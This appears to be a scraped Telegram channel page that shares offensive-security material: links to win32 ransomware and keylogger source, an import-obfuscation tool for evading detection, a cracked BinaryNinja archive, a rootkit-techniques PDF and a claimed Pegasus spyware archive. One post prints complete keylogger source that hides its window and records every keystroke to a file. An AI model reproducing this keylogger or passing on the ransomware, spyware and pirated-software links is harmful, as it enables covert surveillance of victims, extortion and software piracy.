Source Byte – Telegram
Source Byte
7.75K subscribers
846 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
IHkey is win32 ransomware built using VS 2022 + C++ 17
(Lot of technique)

https://github.com/mr3moe/IHkey
👍1
Loggy is a keylogger that is created in C++

https://github.com/Black0utDev/Loggy
👍1
`This's pretty forward, let's say I've used VirtualProtect and I want to obfuscate it with Sleep, the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep, now at executing the file, windows loader will load Sleep instead of VirtualProtect, and moves the execution to the entry point, from there the execution will be redirected to the shellcode, the tool put before, to find the address of VirtualProtect and use it to replace the address of Sleep which assigned before by the loader.


https://github.com/d35ha/CallObfuscator
🤓1
BinaryNinja-personal_v3.5.7z
249 MB
BinaryNinja_personal_3.5

Select license.dat in license folder
👍3
👍1
👍1
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
simple one i wrote

#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>

using namespace std;

void WriteToLog(LPCSTR text)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
// logFile << text;
logFile.close();
}


int main()
{
char key;
while (TRUE)
{

ShowWindow(GetConsoleWindow(), 0);
Sleep(10);
for (key = 0x8; key <= 0xBE; key++)
{
if (GetAsyncKeyState(key) == -32767)
{


ofstream logFile;
logFile.open("Keys.txt", fstream::app);
logFile << key;
logFile.close();

}
}
}
return 0;
}
❤‍🔥2
Introduction to stack management in x86-64 architecture for Windows
(credits @3shw4r)

offensivecraft.wordpress.com…



#stack , #windows , #stack_managment
🤓2
CodeMachine - Windows Kernel Rootkit Techniques-unlocked.pdf
5.2 MB
CodeMachine - Windows Kernel Rootkit Techniques

Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel

https://www.coursefather.com/2023/12/Windows-rootkits-kernel.html?m=1
1
Pegasus Spyware Zero Click.7z
18.5 MB
#Pegasus #Spy

For educational purposes only. We are not responsible for the use of this material.
❤‍🔥3